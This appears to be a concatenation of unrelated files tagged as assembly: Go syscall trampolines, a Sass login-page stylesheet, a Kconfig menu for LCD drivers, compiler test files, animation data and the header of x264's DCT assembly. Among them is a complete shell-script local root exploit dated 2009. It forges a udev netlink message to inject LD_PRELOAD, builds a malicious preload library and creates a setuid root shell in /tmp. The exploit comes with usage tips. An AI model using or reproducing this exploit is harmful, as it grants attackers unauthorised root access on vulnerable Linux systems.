JMP libc_chflags(SB)
TEXT ·libc_chmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_chmod(SB)
TEXT ·libc_chown_trampoline(SB),NOSPLIT,$0-0
JMP libc_chown(SB)
TEXT ·libc_chroot_trampoline(SB),NOSPLIT,$0-0
JMP libc_chroot(SB)
TEXT ·libc_close_trampoline(SB),NOSPLIT,$0-0
JMP libc_close(SB)
TEXT ·libc_dup_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup(SB)
TEXT ·libc_dup2_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup2(SB)
TEXT ·libc_exchangedata_trampoline(SB),NOSPLIT,$0-0
JMP libc_exchangedata(SB)
TEXT ·libc_exit_trampoline(SB),NOSPLIT,$0-0
JMP libc_exit(SB)
TEXT ·libc_faccessat_trampoline(SB),NOSPLIT,$0-0
JMP libc_faccessat(SB)
TEXT ·libc_fchdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchdir(SB)
TEXT ·libc_fchflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchflags(SB)
TEXT ·libc_fchmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmod(SB)
TEXT ·libc_fchmodat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmodat(SB)
TEXT ·libc_fchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchown(SB)
TEXT ·libc_fchownat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchownat(SB)
TEXT ·libc_flock_trampoline(SB),NOSPLIT,$0-0
JMP libc_flock(SB)
TEXT ·libc_fpathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_fpathconf(SB)
TEXT ·libc_fsync_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsync(SB)
TEXT ·libc_ftruncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_ftruncate(SB)
TEXT ·libc_getdtablesize_trampoline(SB),NOSPLIT,$0-0
JMP libc_getdtablesize(SB)
TEXT ·libc_getegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getegid(SB)
TEXT ·libc_geteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_geteuid(SB)
TEXT ·libc_getgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgid(SB)
TEXT ·libc_getpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgid(SB)
TEXT ·libc_getpgrp_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgrp(SB)
TEXT ·libc_getpid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpid(SB)
TEXT ·libc_getppid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getppid(SB)
TEXT ·libc_getpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpriority(SB)
TEXT ·libc_getrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrlimit(SB)
TEXT ·libc_getrusage_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrusage(SB)
TEXT ·libc_getsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsid(SB)
TEXT ·libc_getuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getuid(SB)
TEXT ·libc_issetugid_trampoline(SB),NOSPLIT,$0-0
JMP libc_issetugid(SB)
TEXT ·libc_kqueue_trampoline(SB),NOSPLIT,$0-0
JMP libc_kqueue(SB)
TEXT ·libc_lchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_lchown(SB)
TEXT ·libc_link_trampoline(SB),NOSPLIT,$0-0
JMP libc_link(SB)
TEXT ·libc_linkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_linkat(SB)
TEXT ·libc_listen_trampoline(SB),NOSPLIT,$0-0
JMP libc_listen(SB)
TEXT ·libc_mkdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdir(SB)
TEXT ·libc_mkdirat_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdirat(SB)
TEXT ·libc_mkfifo_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkfifo(SB)
TEXT ·libc_mknod_trampoline(SB),NOSPLIT,$0-0
JMP libc_mknod(SB)
TEXT ·libc_open_trampoline(SB),NOSPLIT,$0-0
JMP libc_open(SB)
TEXT ·libc_openat_trampoline(SB),NOSPLIT,$0-0
JMP libc_openat(SB)
TEXT ·libc_pathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_pathconf(SB)
TEXT ·libc_pread_trampoline(SB),NOSPLIT,$0-0
JMP libc_pread(SB)
TEXT ·libc_pwrite_trampoline(SB),NOSPLIT,$0-0
JMP libc_pwrite(SB)
TEXT ·libc_read_trampoline(SB),NOSPLIT,$0-0
JMP libc_read(SB)
TEXT ·libc_readlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlink(SB)
TEXT ·libc_readlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlinkat(SB)
TEXT ·libc_rename_trampoline(SB),NOSPLIT,$0-0
JMP libc_rename(SB)
TEXT ·libc_renameat_trampoline(SB),NOSPLIT,$0-0
JMP libc_renameat(SB)
TEXT ·libc_revoke_trampoline(SB),NOSPLIT,$0-0
JMP libc_revoke(SB)
TEXT ·libc_rmdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_rmdir(SB)
TEXT ·libc_lseek_trampoline(SB),NOSPLIT,$0-0
JMP libc_lseek(SB)
TEXT ·libc_select_trampoline(SB),NOSPLIT,$0-0
JMP libc_select(SB)
TEXT ·libc_setegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setegid(SB)
TEXT ·libc_seteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_seteuid(SB)
TEXT ·libc_setgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgid(SB)
TEXT ·libc_setlogin_trampoline(SB),NOSPLIT,$0-0
JMP libc_setlogin(SB)
TEXT ·libc_setpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpgid(SB)
TEXT ·libc_setpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpriority(SB)
TEXT ·libc_setprivexec_trampoline(SB),NOSPLIT,$0-0
JMP libc_setprivexec(SB)
TEXT ·libc_setregid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setregid(SB)
TEXT ·libc_setreuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setreuid(SB)
TEXT ·libc_setrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_setrlimit(SB)
TEXT ·libc_setsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsid(SB)
TEXT ·libc_settimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_settimeofday(SB)
TEXT ·libc_setuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setuid(SB)
TEXT ·libc_symlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlink(SB)
TEXT ·libc_symlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlinkat(SB)
TEXT ·libc_sync_trampoline(SB),NOSPLIT,$0-0
JMP libc_sync(SB)
TEXT ·libc_truncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_truncate(SB)
TEXT ·libc_umask_trampoline(SB),NOSPLIT,$0-0
JMP libc_umask(SB)
TEXT ·libc_undelete_trampoline(SB),NOSPLIT,$0-0
JMP libc_undelete(SB)
TEXT ·libc_unlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlink(SB)
TEXT ·libc_unlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlinkat(SB)
TEXT ·libc_unmount_trampoline(SB),NOSPLIT,$0-0
JMP libc_unmount(SB)
TEXT ·libc_write_trampoline(SB),NOSPLIT,$0-0
JMP libc_write(SB)
TEXT ·libc_mmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_mmap(SB)
TEXT ·libc_munmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_munmap(SB)
TEXT ·libc_gettimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_gettimeofday(SB)
TEXT ·libc_fstat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstat(SB)
TEXT ·libc_fstatat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatat(SB)
TEXT ·libc_fstatfs_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatfs(SB)
TEXT ·libc_getfsstat_trampoline(SB),NOSPLIT,$0-0
JMP libc_getfsstat(SB)
TEXT ·libc_lstat_trampoline(SB),NOSPLIT,$0-0
JMP libc_lstat(SB)
TEXT ·libc_stat_trampoline(SB),NOSPLIT,$0-0
JMP libc_stat(SB)
TEXT ·libc_statfs_trampoline(SB),NOSPLIT,$0-0
JMP libc_statfs(SB)
| {
"language": "Assembly"
} |
/* Definition of the C library's environment pointer `__environ',
 * initialised to a null pointer, with the conventional weak aliases
 * `_environ' and `environ' pointing at the same object. */
.data
.globl __environ
.type __environ,%object
__environ:
.dc.a 0 /* one address-sized slot, initially NULL */
.size __environ, .-__environ
.weak _environ
.globl _environ
.set _environ, __environ /* alias: _environ == __environ */
.weak environ
.set environ, __environ /* alias: environ == __environ */
| {
"language": "Assembly"
} |
@mixin background-image-with-ms($image)
@include background-image($image) // Compass default version, for everything but IE 10.
background-image: -ms-#{$image} // Vendor prefixes for IE 10.
#login
min-height: 100%
padding-bottom: 45px
#shop-img
z-index: 1
position: absolute
margin: 0 auto
width: 69.5px
left: 0
right: 0
#login-header
padding-top: 40px
margin-bottom: 30px
color: #6d6d6d
h1, h4
margin: 0
padding: 0
#login-panel
margin: 0 auto
width: 500px
.form-control
height: inherit !important
padding: 10px 8px !important
@media (max-width: $screen-phone)
width: 90%
.panel
@include border-radius(0)
@include box-shadow(0 1px 3px rgba(0,0,0,0.30))
.panel-footer
height: inherit
margin: 0 -20px -20px
.flip-container
height: 420px
margin-top: 115px
@include perspective(1000px)
transform-style: preserve-3d
//@include animate(fadeInDown, 0.3s)
&.flip
.flipper
@include rotateY(180deg)
.back
@include backface-visibility(visible)
.flipper
position: relative
transform-style: preserve-3d
@include transition-duration(0.6s)
@include transform-style
.front, .back
width: 100%
padding: 40px
position: absolute
transition: 0.6s
transform-style: preserve-3d
top: 0
@include backface-visibility(hidden)
@include left(0)
.front
@include rotateY(0)
z-index: 2
.back
display: none
z-index: 1
@include rotateY(180deg)
#shop_name, #reset_name, #reset_confirm_name, #forgot_name, #forgot_confirm_name
text-align: center
font-family: $font-family-sans-serif
#login_form
padding-top: 15px
#remind-me
margin-top: 0
#login-footer
margin-top: 20px
a
color: #A0AAB5
| {
"language": "Assembly"
} |
// SPDX-License-Identifier: GPL-2.0+
/*
* Copyright (C) 2015 Google, Inc
*/
#include <common.h>
| {
"language": "Assembly"
} |
#
# For a description of the syntax of this configuration file,
# see Documentation/kbuild/kconfig-language.txt.
#
# Auxiliary display drivers configuration.
#
menu "Auxiliary Display support"
depends on PARPORT
config KS0108
tristate "KS0108 LCD Controller"
depends on PARPORT_PC
default n
---help---
If you have an LCD controlled by one or more KS0108
controllers, say Y. You will need also another more specific
driver for your LCD.
Depends on Parallel Port support. If you say Y at
parport, you will be able to compile this as a module (M)
and built-in as well (Y).
To compile this as a module, choose M here:
the module will be called ks0108.
If unsure, say N.
config KS0108_PORT
hex "Parallel port where the LCD is connected"
depends on KS0108
default 0x378
---help---
The address of the parallel port where the LCD is connected.
The first standard parallel port address is 0x378.
The second standard parallel port address is 0x278.
The third standard parallel port address is 0x3BC.
You can specify a different address if you need.
If you don't know what I'm talking about, load the parport module,
and execute "dmesg" or "cat /proc/ioports". You can see there how
many parallel ports are present and which address each one has.
Usually you only need to use 0x378.
If you compile this as a module, you can still override this
using the module parameters.
config KS0108_DELAY
int "Delay between each control writing (microseconds)"
depends on KS0108
default "2"
---help---
Amount of time the ks0108 should wait between each control write
to the parallel port.
If your driver seems to miss random writings, increment this.
If you don't know what I'm talking about, ignore it.
If you compile this as a module, you can still override this
value using the module parameters.
config CFAG12864B
tristate "CFAG12864B LCD"
depends on X86
depends on FB
depends on KS0108
select FB_SYS_FILLRECT
select FB_SYS_COPYAREA
select FB_SYS_IMAGEBLIT
select FB_SYS_FOPS
default n
---help---
If you have a Crystalfontz 128x64 2-color LCD, cfag12864b Series,
say Y. You also need the ks0108 LCD Controller driver.
For help about how to wire your LCD to the parallel port,
check Documentation/auxdisplay/cfag12864b
Depends on the x86 arch and the framebuffer support.
The LCD framebuffer driver can be attached to a console.
It will work fine. However, you can't attach it to the fbdev driver
of the xorg server.
To compile this as a module, choose M here:
the modules will be called cfag12864b and cfag12864bfb.
If unsure, say N.
config CFAG12864B_RATE
int "Refresh rate (hertz)"
depends on CFAG12864B
default "20"
---help---
Refresh rate of the LCD.
As the LCD is not memory mapped, the driver has to do the work in
software. This means you should be careful when setting this value too high.
If your CPUs are really slow or you feel the system is slowed down,
decrease the value.
Be careful about setting this to a very high value:
you can freeze the computer, or the LCD may not be able to draw as fast
as you are requesting.
If you don't know what I'm talking about, ignore it.
If you compile this as a module, you can still override this
value using the module parameters.
endmenu
| {
"language": "Assembly"
} |
CHECK: SAXPY (functor method)
CHECK-NEXT: 2 * 1 + 1 = 3
CHECK-NEXT: 2 * 2 + 1 = 5
CHECK-NEXT: 2 * 3 + 1 = 7
CHECK-NEXT: 2 * 4 + 1 = 9
CHECK-NEXT: SAXPY (placeholder method)
CHECK-NEXT: 2 * 1 + 1 = 3
CHECK-NEXT: 2 * 2 + 1 = 5
CHECK-NEXT: 2 * 3 + 1 = 7
CHECK-NEXT: 2 * 4 + 1 = 9
| {
"language": "Assembly"
} |
;---------------------------------------
;
; animation cel data
;
; Header layout (presumably shared by all cels -- TODO confirm against
; the cel-drawing code): a flags byte, a bitmask, byte offsets of the
; start/end and contents tables below, three position bytes, two
; bitmap rows, then six word offsets to the per-frame cel records.
beds_data::
byte both + 1
byte 0b00100000
byte beds_start_end - beds_data ; offset of start/end table
byte beds_contents_xy - beds_data ; offset of contents x/y table
byte 252+right,32+left,255
byte 0b11111100
byte 0b11101100
word beds_data_a - beds_data ; offsets of the six cel records below
word beds_data_b - beds_data
word beds_data_c - beds_data
word beds_data_d - beds_data
word beds_data_e - beds_data
word beds_data_f - beds_data
beds_start_end:
byte 0,0,1,1
beds_contents_xy:
byte 249,13,253,13
; Each cel record: a 6-byte header followed by image bytes.
; `run,n,...` entries look like run-length encoding -- TODO confirm
; against the decoder.
beds_data_a:
byte cel_box + 0x01, 0x29, 0xf7, 0x00, 0x00, 0x00
byte 0xbe
beds_data_b:
byte cel_box + 0x01, 0x35, 0x04, 0x0c, 0x00, 0x00
byte 0xbe
beds_data_c:
byte cel_box + tb_bord + 0x0c, 0x13, 0xf8, 0xf3, 0x00, 0x00
byte 0q1111 ; NOTE(review): 0q.. is octal; sibling records use 0b.. binary -- confirm intended
beds_data_d:
byte 0x05, 0x08, 0xff, 0xfa, 0x00, 0x00
byte run,0x80+1
byte 2
byte 11
byte 47
byte 11
byte 2
byte run,0x80+2
byte 170
byte 255
byte 255
byte 170
byte 255
byte 255
byte 175
byte 10
byte 170
byte 255
byte 255
byte 170
byte run,3,255
byte 170
byte 170
byte 255
byte 255
byte 170
byte 255
byte 255
byte 254
byte 168
byte 128
byte 224
byte 248
byte 190
byte 248
byte 224
byte 128
byte run,0x80+1
beds_data_e:
byte 0x03, 0x04, 0xf6, 0x04, 0x00, 0x00
byte run,4,2
byte 255
byte 170
byte 255
byte 170
byte run,4,128
beds_data_f:
byte 0x03, 0x04, 0x03, 0x10, 0x00, 0x00
byte run,4,2
byte 255
byte 170
byte 255
byte 170
byte run,4,128
| {
"language": "Assembly"
} |
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
#
# Structure: three here-documents write C sources to disk, which are then
# compiled and run.  NOTE(review): the _EOF delimiters are unquoted, so the
# shell would expand $-variables inside the heredocs; the embedded C happens
# to contain no '$', so the sources are written out verbatim.
#
# Step 1: helper that forges a udev "add" uevent over a netlink socket
# addressed to the pid given in $1, smuggling LD_PRELOAD=/tmp/libno_ex.so.1.0
# into the environment udevd uses, then waits and runs the (hopefully now
# root-owned, setuid) /tmp/suid.
# NOTE(review): udev.c reads argv[1] without an argc check -- running this
# script with no argument makes the helper crash rather than fail cleanly.
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
execl("/tmp/suid", "suid", (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev
# Step 2: shared object whose _init runs on preload; executed inside a
# root process it chowns /tmp/suid to root and sets the setuid bit.
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
# Step 3: minimal setuid shell-spawner payload.
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
# Fire: send the forged uevent at the netlink pid supplied by the caller.
/tmp/udev $1
# milw0rm.com [2009-04-20]
| {
"language": "Assembly"
} |
// RUN: %clang_cc1 -triple i386-unknown-unknown -emit-pch -o %t1 %S/pchpch1.h
// RUN: %clang_cc1 -triple i386-unknown-unknown -emit-pch -o %t2 %S/pchpch2.h -include-pch %t1
// RUN: %clang_cc1 -triple i386-unknown-unknown -fsyntax-only %s -include-pch %t2
// The purpose of this test is to make sure that a PCH created while including
// an existing PCH can be loaded.
| {
"language": "Assembly"
} |
;*****************************************************************************
;* dct-a.asm: x86 transform and zigzag
;*****************************************************************************
;* Copyright (C) 2003-2017 x264 project
;*
;* Authors: Holger Lubitz <[email protected]>
;* Loren Merritt <[email protected]>
;* Laurent Aimar <[email protected]>
;* Min Chen <chenm001@163.com>
;* Fiona Glaser <[email protected]>
;*
;* This program is free software; you can redistribute it and/or modify
;* it under the terms of the GNU General Public License as published by
;* the Free Software Foundation; either version 2 of the License, or
;* (at your option) any later version.
;*
;* This program is distributed in the hope that it will be useful,
;* but WITHOUT ANY WARRANTY; without even the implied warranty of
;* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
;* GNU General Public License for more details.
;*
;* You should have received a copy of the GNU General Public License
;* along with this program; if not, write to the Free Software
;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02111, USA.
;*
;* This program is also available under a commercial proprietary license.
;* For more information, contact us at [email protected].
;*****************************************************************************
%include "x86inc.asm"
%include "x86util.asm"
SECTION_RODATA 64
; AVX-512 permutation indices are bit-packed to save cache
%if HIGH_BIT_DEPTH
scan_frame_avx512: dd 0x00bf0200, 0x00fd7484, 0x0033a611, 0x0069d822 ; bits 0-3: 4x4_frame
dd 0x00a3ca95, 0x00dd8d08, 0x00e75b8c, 0x00a92919 ; bits 4-8: 8x8_frame1
dd 0x0072f6a6, 0x003c8433, 0x007e5247, 0x00b6a0ba ; bits 9-13: 8x8_frame2
dd 0x00ecf12d, 0x00f3239e, 0x00b9540b, 0x00ff868f ; bits 14-18: 8x8_frame3
; bits 19-23: 8x8_frame4
scan_field_avx512: dd 0x0006b240, 0x000735a1, 0x0007b9c2, 0x0009bde8 ; bits 0-4: 8x8_field1
dd 0x000c4e69, 0x000ce723, 0x000a0004, 0x000aeb4a ; bits 5-9: 8x8_field2
dd 0x000b5290, 0x000bd6ab, 0x000d5ac5, 0x000ddee6 ; bits 10-14: 8x8_field3
dd 0x000e6f67, 0x000e842c, 0x000f0911, 0x000ff058 ; bits 15-19: 8x8_field4
cavlc_shuf_avx512: dd 0x00018820, 0x000398a4, 0x0005a928, 0x0007b9ac ; bits 0-4: interleave1
dd 0x0009ca30, 0x000bdab4, 0x000deb38, 0x000ffbbc ; bits 5-9: interleave2
dd 0x00010c01, 0x00031c85, 0x00052d09, 0x00073d8d ; bits 10-14: interleave3
dd 0x00094e11, 0x000b5e95, 0x000d6f19, 0x000f7f9d ; bits 15-19: interleave4
%else
dct_avx512: dd 0x10000000, 0x00021104, 0x3206314c, 0x60042048 ; bits 0-4: dct8x8_fenc bits 5-9: dct8x8_fdec
dd 0x98008a10, 0x20029b14, 0xba06bb5c, 0x4004aa58 ; bits 10-13: dct16x16_fenc bits 14-18: dct16x16_fdec
dd 0x54004421, 0x80025525, 0x7606756d, 0xe0046469 ; bits(e) 24-27: idct8x8_idct1 bits(e) 28-31: idct8x8_idct2
dd 0xdc00ce31, 0xa002df35, 0xfe06ff7d, 0xc004ee79 ; bits(o) 24-31: idct8x8_gather
scan_frame_avx512: dw 0x7000, 0x5484, 0x3811, 0x1c22, 0x3c95, 0x5908, 0x758c, 0x9119 ; bits 0-3: 4x4_frame
dw 0xaca6, 0xc833, 0xe447, 0xe8ba, 0xcd2d, 0xb19e, 0x960b, 0x7a8f ; bits 4-9: 8x8_frame1
dw 0x5e10, 0x7da0, 0x9930, 0xb4c0, 0xd050, 0xec60, 0xf0d0, 0xd540 ; bits 10-15: 8x8_frame2
dw 0xb9b0, 0x9e20, 0xbe90, 0xdb00, 0xf780, 0xfb10, 0xdea0, 0xfe30
scan_field_avx512: dw 0x0700, 0x0741, 0x0782, 0x07c8, 0x08c9, 0x0a43, 0x0c04, 0x0a8a ; bits 0-5: 8x8_field1
dw 0x0910, 0x094b, 0x0985, 0x09c6, 0x0ac7, 0x0c4c, 0x0c91, 0x0b18 ; bits 6-11: 8x8_field2
dw 0x0b52, 0x0b8d, 0x0bce, 0x0ccf, 0x0e13, 0x0e59, 0x0d20, 0x0d5a
dw 0x0d94, 0x0dd5, 0x0e96, 0x0ed7, 0x0f1b, 0x0f61, 0x0fa8, 0x0fe2
cavlc_shuf_avx512: dw 0x0080, 0x0184, 0x0288, 0x038c, 0x0490, 0x0594, 0x0698, 0x079c ; bits 0-5: interleave1
dw 0x08a0, 0x09a4, 0x0aa8, 0x0bac, 0x0cb0, 0x0db4, 0x0eb8, 0x0fbc ; bits 6-11: interleave2
dw 0x00c1, 0x01c5, 0x02c9, 0x03cd, 0x04d1, 0x05d5, 0x06d9, 0x07dd
dw 0x08e1, 0x09e5, 0x0ae9, 0x0bed, 0x0cf1, 0x0df5, 0x0ef9, 0x0ffd
%endif
pw_ppmmmmpp: dw 1,1,-1,-1,-1,-1,1,1
pb_sub4frame: db 0,1,4,8,5,2,3,6,9,12,13,10,7,11,14,15
pb_sub4field: db 0,4,1,8,12,5,9,13,2,6,10,14,3,7,11,15
pb_subacmask: dw 0,-1,-1,-1,-1,-1,-1,-1
pb_scan4framea: SHUFFLE_MASK_W 6,3,7,0,4,1,2,5
pb_scan4frameb: SHUFFLE_MASK_W 0,4,1,2,5,6,3,7
pb_scan4frame2a: SHUFFLE_MASK_W 0,4,1,2,5,8,12,9
pb_scan4frame2b: SHUFFLE_MASK_W 6,3,7,10,13,14,11,15
pb_scan8framet1: SHUFFLE_MASK_W 0, 1, 6, 7, 8, 9, 13, 14
pb_scan8framet2: SHUFFLE_MASK_W 2 , 3, 4, 7, 9, 15, 10, 14
pb_scan8framet3: SHUFFLE_MASK_W 0, 1, 5, 6, 8, 11, 12, 13
pb_scan8framet4: SHUFFLE_MASK_W 0, 3, 4, 5, 8, 11, 12, 15
pb_scan8framet5: SHUFFLE_MASK_W 1, 2, 6, 7, 9, 10, 13, 14
pb_scan8framet6: SHUFFLE_MASK_W 0, 3, 4, 5, 10, 11, 12, 15
pb_scan8framet7: SHUFFLE_MASK_W 1, 2, 6, 7, 8, 9, 14, 15
pb_scan8framet8: SHUFFLE_MASK_W 0, 1, 2, 7, 8, 10, 11, 14
pb_scan8framet9: SHUFFLE_MASK_W 1, 4, 5, 7, 8, 13, 14, 15
pb_scan8frame1: SHUFFLE_MASK_W 0, 8, 1, 2, 9, 12, 4, 13
pb_scan8frame2: SHUFFLE_MASK_W 4, 0, 1, 5, 8, 10, 12, 14
pb_scan8frame3: SHUFFLE_MASK_W 12, 10, 8, 6, 2, 3, 7, 9
pb_scan8frame4: SHUFFLE_MASK_W 0, 1, 8, 12, 4, 13, 9, 2
pb_scan8frame5: SHUFFLE_MASK_W 5, 14, 10, 3, 11, 15, 6, 7
pb_scan8frame6: SHUFFLE_MASK_W 6, 8, 12, 13, 9, 7, 5, 3
pb_scan8frame7: SHUFFLE_MASK_W 1, 3, 5, 7, 10, 14, 15, 11
pb_scan8frame8: SHUFFLE_MASK_W 10, 3, 11, 14, 5, 6, 15, 7
pb_scan8field1 : SHUFFLE_MASK_W 0, 1, 2, 8, 9, 3, 4, 10
pb_scan8field2a: SHUFFLE_MASK_W 0x80, 11, 5, 6, 7, 12,0x80,0x80
pb_scan8field2b: SHUFFLE_MASK_W 0,0x80,0x80,0x80,0x80,0x80, 1, 8
pb_scan8field3a: SHUFFLE_MASK_W 10, 5, 6, 7, 11,0x80,0x80,0x80
pb_scan8field3b: SHUFFLE_MASK_W 0x80,0x80,0x80,0x80,0x80, 1, 8, 2
pb_scan8field4a: SHUFFLE_MASK_W 4, 5, 6, 7, 11,0x80,0x80,0x80
pb_scan8field6 : SHUFFLE_MASK_W 4, 5, 6, 7, 11,0x80,0x80, 12
pb_scan8field7 : SHUFFLE_MASK_W 5, 6, 7, 11,0x80,0x80, 12, 13
SECTION .text
cextern pw_32_0
cextern pw_32
cextern pw_512
cextern pw_8000
cextern pw_pixel_max
cextern hsub_mul
cextern pb_1
cextern pw_1
cextern pd_1
cextern pd_32
cextern pw_ppppmmmm
cextern pw_pmpmpmpm
cextern deinterleave_shufd
cextern pb_unpackbd1
cextern pb_unpackbd2
; One pass of a 4-point Walsh-Hadamard transform over four registers.
; %1 = element size suffix (w/d), %2-%5 = data registers, %6 = temp.
; The trailing SWAP restores the outputs to ascending register order.
%macro WALSH4_1D 6
SUMSUB_BADC %1, %5, %4, %3, %2, %6
SUMSUB_BADC %1, %5, %3, %4, %2, %6
SWAP %2, %5, %4
%endmacro
%macro SUMSUB_17BIT 4 ; a, b, tmp, 0x8000
; Halved sum/difference with 17-bit intermediate precision kept inside
; 16-bit lanes: inputs are biased into the unsigned domain by xor-ing
; with 0x8000 (%4 must hold [pw_8000], loaded by the caller), pavgw
; computes (x+y+1)>>1 without overflow, then the bias is xor-ed away.
; After the SWAP (for in-range inputs): %1 = (a+b+1)>>1,
; %2 = (a-b+1)>>1.  Clobbers %3; %4 is preserved.
movq m%3, m%4
pxor m%1, m%4
psubw m%3, m%2
pxor m%2, m%4
pavgw m%3, m%1
pavgw m%2, m%1
pxor m%3, m%4
pxor m%2, m%4
SWAP %1, %2, %3
%endmacro
; Widen 8 packed int16 in %1 into two registers of 4 sign-extended
; int32 each: punpck places every word in the upper 16 bits of a
; dword, psrad 16 sign-extends it and discards the interleaved junk.
; After the SWAP, %1 holds the widened low half and %2 the widened
; high half (%3 is left with the original packed words).
%macro DCT_UNPACK 3
punpcklwd %3, %1
punpckhwd %2, %1
psrad %3, 16
psrad %2, 16
SWAP %1, %3
%endmacro
%if HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void dct4x4dc( dctcoef d[4][4] )
;-----------------------------------------------------------------------------
; In-place 2-D Walsh-Hadamard transform of the 4x4 DC coefficients.
